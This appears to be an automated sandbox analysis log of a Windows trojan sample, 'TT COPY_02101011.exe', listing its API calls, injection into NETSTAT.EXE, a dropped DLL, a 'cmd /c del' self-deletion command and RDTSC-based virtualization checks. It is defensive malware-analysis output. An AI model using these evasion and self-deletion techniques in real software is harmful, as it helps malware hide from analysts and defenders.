Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E22AE	9_2_032E22AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321F900	9_2_0321F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032EE824	9_2_032EE824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1002	9_2_032D1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E20A8	9_2_032E20A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322B090	9_2_0322B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E28EC	9_2_032E28EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E1FF1	9_2_032E1FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032EDFCE	9_2_032EDFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03236E30	9_2_03236E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DD616	9_2_032DD616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E2EF7	9_2_032E2EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03210D20	9_2_03210D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E2D07	9_2_032E2D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E1D55	9_2_032E1D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242581	9_2_03242581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322D5E0	9_2_0322D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E25DD	9_2_032E25DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322841F	9_2_0322841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DD466	9_2_032DD466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077D0EE	9_2_0077D0EE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_00768C90	9_2_00768C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_00762D90	9_2_00762D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_00762D88	9_2_00762D88
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_00762FB0	9_2_00762FB0

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0321B150 appears 45 times
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: String function: 00A9B150 appears 34 times

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_004185F0 NtCreateFile,	1_2_004185F0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_004186A0 NtReadFile,	1_2_004186A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00418720 NtClose,	1_2_00418720
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_004187D0 NtAllocateVirtualMemory,	1_2_004187D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00AD98F0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00AD9860
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,	1_2_00AD9840
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,	1_2_00AD99A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00AD9910
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,	1_2_00AD9A20
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00AD9A00
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,	1_2_00AD9A50
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,	1_2_00AD95D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,	1_2_00AD9540
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00AD96E0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00AD9660
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00AD97A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00AD9780
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,	1_2_00AD9FE0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00AD9710
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD98A0 NtWriteVirtualMemory,	1_2_00AD98A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9820 NtEnumerateKey,	1_2_00AD9820
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ADB040 NtSuspendThread,	1_2_00ADB040
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD99D0 NtCreateProcessEx,	1_2_00AD99D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9950 NtQueueApcThread,	1_2_00AD9950
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9A80 NtOpenDirectoryObject,	1_2_00AD9A80
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9A10 NtQuerySection,	1_2_00AD9A10
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ADA3B0 NtGetContextThread,	1_2_00ADA3B0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9B00 NtSetValueKey,	1_2_00AD9B00
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD95F0 NtQueryInformationFile,	1_2_00AD95F0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9520 NtWaitForSingleObject,	1_2_00AD9520
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ADAD30 NtSetContextThread,	1_2_00ADAD30
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD9560 NtWriteFile,	1_2_00AD9560
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD96D0 NtCreateKey,	1_2_00AD96D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259A50 NtCreateFile,LdrInitializeThunk,	9_2_03259A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03259910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032599A0 NtCreateSection,LdrInitializeThunk,	9_2_032599A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03259860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259840 NtDelayExecution,LdrInitializeThunk,	9_2_03259840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03259710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03259780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03259FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03259660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259650 NtQueryValueKey,LdrInitializeThunk,	9_2_03259650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032596E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_032596E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032596D0 NtCreateKey,LdrInitializeThunk,	9_2_032596D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259540 NtReadFile,LdrInitializeThunk,	9_2_03259540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032595D0 NtClose,LdrInitializeThunk,	9_2_032595D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259B00 NtSetValueKey,	9_2_03259B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325A3B0 NtGetContextThread,	9_2_0325A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259A20 NtResumeThread,	9_2_03259A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259A00 NtProtectVirtualMemory,	9_2_03259A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259A10 NtQuerySection,	9_2_03259A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259A80 NtOpenDirectoryObject,	9_2_03259A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259950 NtQueueApcThread,	9_2_03259950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032599D0 NtCreateProcessEx,	9_2_032599D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259820 NtEnumerateKey,	9_2_03259820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325B040 NtSuspendThread,	9_2_0325B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032598A0 NtWriteVirtualMemory,	9_2_032598A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032598F0 NtReadVirtualMemory,	9_2_032598F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259730 NtQueryVirtualMemory,	9_2_03259730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325A710 NtOpenProcessToken,	9_2_0325A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259760 NtOpenProcess,	9_2_03259760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325A770 NtOpenThread,	9_2_0325A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259770 NtSetInformationFile,	9_2_03259770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032597A0 NtUnmapViewOfSection,	9_2_032597A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259610 NtEnumerateValueKey,	9_2_03259610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259670 NtQueryInformationProcess,	9_2_03259670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259520 NtWaitForSingleObject,	9_2_03259520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325AD30 NtSetContextThread,	9_2_0325AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03259560 NtWriteFile,	9_2_03259560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032595F0 NtQueryInformationFile,	9_2_032595F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_007785F0 NtCreateFile,	9_2_007785F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_007786A0 NtReadFile,	9_2_007786A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_00778720 NtClose,	9_2_00778720
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_007787D0 NtAllocateVirtualMemory,	9_2_007787D0

Source: TT COPY_02101011.exe, 00000000.00000003.679935537.0000000002B86000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000000.00000003.679172952.0000000002D1F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe
Source: TT COPY_02101011.exe, 00000001.00000002.748099738.0000000000D1F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs TT COPY_02101011.exe

Source: TT COPY_02101011.exe	Virustotal: Detection: 36%
Source: TT COPY_02101011.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

File read: C:\Users\user\Desktop\TT COPY_02101011.exe

Jump to behavior

Source: TT COPY_02101011.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

File created: C:\Users\user\AppData\Local\Temp\nsxA74D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/2@13/8

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040411B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_100116A5 push ecx; ret	0_2_100116B8
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041C060 push edx; ret	1_2_0041C152
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041B832 push eax; ret	1_2_0041B838
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041B83B push eax; ret	1_2_0041B8A2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041B89C push eax; ret	1_2_0041B8A2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_004153BE pushfd ; ret	1_2_004153C0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041551B push ecx; iretd	1_2_0041551D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041B7E5 push eax; ret	1_2_0041B838
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AED0D1 push ecx; ret	1_2_00AED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0326D0D1 push ecx; ret	9_2_0326D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077C060 push edx; ret	9_2_0077C152
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077B832 push eax; ret	9_2_0077B838
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077B83B push eax; ret	9_2_0077B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077B89C push eax; ret	9_2_0077B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_007753BE pushfd ; ret	9_2_007753C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077551B push ecx; iretd	9_2_0077551D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0077B7E5 push eax; ret	9_2_0077B838

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C49

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

File created: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"			Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000768614 second address: 000000000076861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000007689AE second address: 00000000007689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 6084	Thread sleep time: -50000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6328	Thread sleep time: -44000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 1_2_004088E0 rdtsc

1_2_004088E0

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405250
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00405C22 FindFirstFileA,FindClose,	0_2_00405C22
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630

Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.725756968.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.684710887.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_10013220

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

0_2_10013220

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C49

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,

0_2_10001000

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 1_2_004088E0 rdtsc

1_2_004088E0

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]	1_2_00AD90AF
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]	1_2_00ACF0BF
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]	1_2_00ACF0BF
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]	1_2_00ACF0BF
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]	1_2_00A99080
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]	1_2_00B13884
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]	1_2_00B13884
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]	1_2_00A958EC
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00B2B8D0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]	1_2_00AAB02A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]	1_2_00AAB02A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]	1_2_00AAB02A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]	1_2_00AAB02A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]	1_2_00AC002D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]	1_2_00AC002D
